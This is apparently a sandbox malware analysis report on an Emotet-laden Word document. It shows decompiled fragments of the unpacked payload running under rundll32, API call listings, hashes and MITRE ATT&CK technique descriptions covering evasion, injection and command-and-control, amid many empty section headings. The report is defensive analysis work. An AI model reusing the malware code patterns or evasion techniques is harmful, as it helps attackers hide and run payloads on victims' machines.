Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: try_get_function
String ID: ;\[a$FlsAlloc
API String ID: 2742660187-556808986
Opcode ID: 4bcbced38ed92a73f08a3c174296954a259e0c26880808ba5550370609c85abe
Instruction ID: 8397cc8d114d2a52547e22f8418df74f21234adda3bfffdbbe8fe25e92fcf07c
Opcode Fuzzy Hash: 4bcbced38ed92a73f08a3c174296954a259e0c26880808ba5550370609c85abe
Instruction Fuzzy Hash: 1ED01232D46525A3DE1035DB6C15A9DFF45C7429A2F42C071E928551019661495047D9

Uniqueness

Uniqueness Score: -1.00%

Function 615CEAB3, Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,004665D0), ref: 615CEB49
GetLastError.KERNEL32 ref: 615CEB57
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 615CEBB2

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: b3225826e17c36ac8581d9480480cd4d2e719db9bff47ef30027d2f21d371858
Instruction ID: da305f4215524866049435ce63a87eef3259f47ce3fd31fd7fbf4437645b1388
Opcode Fuzzy Hash: b3225826e17c36ac8581d9480480cd4d2e719db9bff47ef30027d2f21d371858
Instruction Fuzzy Hash: FB412930A04646AFDB118FEACC85BAEFFB5EF42B14F15C56CE86597190DB309940C762

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 7060 Parent PID: 3728 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	3.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1075
Total number of Limit Nodes:	6

Executed Functions

Function 006931D2, Relevance: 1.6, APIs: 1, Instructions: 77
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E006931D2(void* __ecx, WCHAR* __edx, intOrPtr _a8, intOrPtr _a12, WCHAR* _a16, struct _STARTUPINFOW* _a28, intOrPtr _a32, intOrPtr _a36, struct _PROCESS_INFORMATION* _a48, int _a52, intOrPtr _a56) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				struct _SECURITY_ATTRIBUTES* _v24;
				intOrPtr _v28;
				void* _t54;
				int _t63;
				signed int _t65;
				WCHAR* _t71;

				_push(_a56);
				_t71 = __edx;
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(0);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(0);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				E00692523(_t54);
				_v28 = 0x2cec17;
				_v24 = 0;
				_v16 = 0x5aadab;
				_v16 = _v16 << 3;
				_v16 = _v16 >> 0xc;
				_v16 = _v16 ^ 0x000031a8;
				_v12 = 0x82119f;
				_v12 = _v12 >> 2;
				_v12 = _v12 + 0xffff09c3;
				_t65 = 0x25;
				_v12 = _v12 / _t65;
				_v12 = _v12 ^ 0x0004d7f2;
				_v8 = 0x7cd8a6;
				_v8 = _v8 >> 6;
				_v8 = _v8 | 0x702a8e48;
				_v8 = _v8 + 0xffff37f0;
				_v8 = _v8 ^ 0x702d019b;
				_v20 = 0x367fb2;
				_v20 = _v20 + 0xffff7ba2;
				_v20 = _v20 ^ 0x003ae9c9;
				E00672309(0x2e4, _t65, _t65, 0xbf8568a3, _t65, 0x9c9047d0);
				_t63 = CreateProcessW(_t71, _a16, 0, 0, _a52, 0, 0, 0, _a28, _a48); // executed
				return _t63;
			}

0x006931da
0x006931df
0x006931e1
0x006931e4
0x006931e7
0x006931e8
0x006931e9
0x006931ec
0x006931ef
0x006931f2
0x006931f3
0x006931f4
0x006931f7
0x006931fa
0x006931fd
0x006931fe
0x00693200
0x00693205
0x0069320f
0x00693214
0x0069321b
0x0069321f
0x00693223
0x0069322a
0x00693231
0x00693235
0x00693241
0x00693249
0x0069324c
0x00693253
0x0069325a
0x0069325e
0x00693265
0x0069326c
0x00693273
0x0069327a
0x00693281
0x006932a1
0x006932bb
0x006932c2

APIs

CreateProcessW.KERNELBASE(000C0354,?,00000000,00000000,?,00000000,00000000,00000000,229292B4,?), ref: 006932BB

Memory Dump Source

Source File: 00000010.00000002.456218614.0000000000670000.00000040.00000001.sdmp, Offset: 00670000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_670000_rundll32.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction ID: d07ca6ab035feebe9c9add83578bd4dd78517dfb68b356b589a6162c47685ef7
Opcode Fuzzy Hash: 1c884f6c38555fd1f2acfe04ef4172838376d53041689723563821acbd5a938d
Instruction Fuzzy Hash: 9C310472801249BBCF65DF96CD09CDFBFB5FB89714F108188F91462220D3B58A60DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00674248, Relevance: 1.5, APIs: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00674248() {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _t52;
				signed int _t53;

				_v24 = _v24 & 0x00000000;
				_v32 = 0xac8d12;
				_v28 = 0x59a528;
				_v12 = 0xae5295;
				_v12 = _v12 << 2;
				_t52 = 0xb;
				_v12 = _v12 / _t52;
				_v12 = _v12 ^ 0x0038a8c1;
				_v20 = 0xfd2184;
				_v20 = _v20 ^ 0xb7361747;
				_v20 = _v20 ^ 0xb7cc531f;
				_v8 = 0xac9b8;
				_t53 = 9;
				_v8 = _v8 / _t53;
				_v8 = _v8 << 0xd;
				_v8 = _v8 >> 0xd;
				_v8 = _v8 ^ 0x00077309;
				_v16 = 0x4164cf;
				_v16 = _v16 << 2;
				_v16 = _v16 ^ 0x010bebe7;
				E00672309(0x37f, _t53, _t53, 0x8b1a77d6, _t53, 0x9c9047d0);
				ExitProcess(0);
			}

0x0067424e
0x00674254
0x0067425b
0x00674262
0x00674269
0x00674272
0x00674277
0x0067427c
0x00674283
0x0067428a
0x00674291
0x00674298
0x006742a2
0x006742aa
0x006742ad
0x006742b1
0x006742b5
0x006742bc
0x006742c3
0x006742c7
0x006742e7
0x006742f1

APIs

ExitProcess.KERNEL32(00000000), ref: 006742F1

Memory Dump Source

Source File: 00000010.00000002.456218614.0000000000670000.00000040.00000001.sdmp, Offset: 00670000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_670000_rundll32.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction ID: 0242397ab8ac47949481286076e860348ae071ff685dcf0ac107ff88089b24cb
Opcode Fuzzy Hash: 11cce549a584f233032fc040f1d8beaa3eb6087a0dfae4806d5bd7ccc63cf562
Instruction Fuzzy Hash: 091128B5E00208EBDB44DFE5D94AADEBBF1FB44308F208089E515A7240D7B45B18CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 006817CB, Relevance: 1.3, APIs: 1, Instructions: 56
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 86%

			E006817CB(WCHAR* __ecx, void* __edx, intOrPtr _a4, WCHAR* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _t44;
				int _t55;
				signed int _t57;
				WCHAR* _t62;

				_push(_a8);
				_t62 = __ecx;
				_push(_a4);
				_push(__ecx);
				E00692523(_t44);
				_v24 = _v24 & 0x00000000;
				_v32 = 0x2c5dd9;
				_v28 = 0x29a411;
				_v16 = 0xb6013c;
				_v16 = _v16 >> 2;
				_v16 = _v16 << 5;
				_v16 = _v16 ^ 0x05bceb0d;
				_v12 = 0xa7496a;
				_t57 = 7;
				_v12 = _v12 * 0x55;
				_v12 = _v12 | 0x1a205192;
				_v12 = _v12 ^ 0x3fab9f8f;
				_v8 = 0xf5055a;
				_v8 = _v8 / _t57;
				_v8 = _v8 + 0xa16;
				_v8 = _v8 * 0x7e;
				_v8 = _v8 ^ 0x1132ba81;
				_v20 = 0xaea409;
				_v20 = _v20 << 6;
				_v20 = _v20 ^ 0x2ba3ef66;
				E00672309(0xb8, _t57, _t57, 0xbf157248, _t57, 0x9c9047d0);
				_t55 = lstrcmpiW(_t62, _a8); // executed
				return _t55;
			}

0x006817d2
0x006817d5
0x006817d7
0x006817db
0x006817dc
0x006817e1
0x006817e8
0x006817f1
0x006817f8
0x006817ff
0x00681803
0x00681807
0x0068180e
0x0068181b
0x00681822
0x00681825
0x0068182c
0x00681833
0x00681844
0x00681847
0x00681859
0x0068185c
0x00681863
0x0068186a
0x0068186e
0x00681881
0x0068188d
0x00681893

APIs

lstrcmpiW.KERNELBASE(?,05BCEB0D,?,?,?,?,?,?,?,?,00000000), ref: 0068188D

Memory Dump Source

Source File: 00000010.00000002.456218614.0000000000670000.00000040.00000001.sdmp, Offset: 00670000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_670000_rundll32.jbxd

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction ID: e466295610240cae96995b4c560f4072c6fe360696c35a8c32ec285d3c58f411
Opcode Fuzzy Hash: d112a349bd06866e322501f938da4f729aeb5c72f8ac7eafb21e1b49d57e3827
Instruction Fuzzy Hash: 472113B5D0020DFBDB08DFA4C94A9EEBBB5EB44314F20818DE425A7240E3B56B049FA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	DLL monitoring, File monitoring, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report 1711.doc

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Emotet

Yara Overview

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "/opt/package/joesandbox/database/analysis/526179/sample/1711.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: bvkaeiku2ncoi2uho3ihdes.cls, Stream Size: 9859

General

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre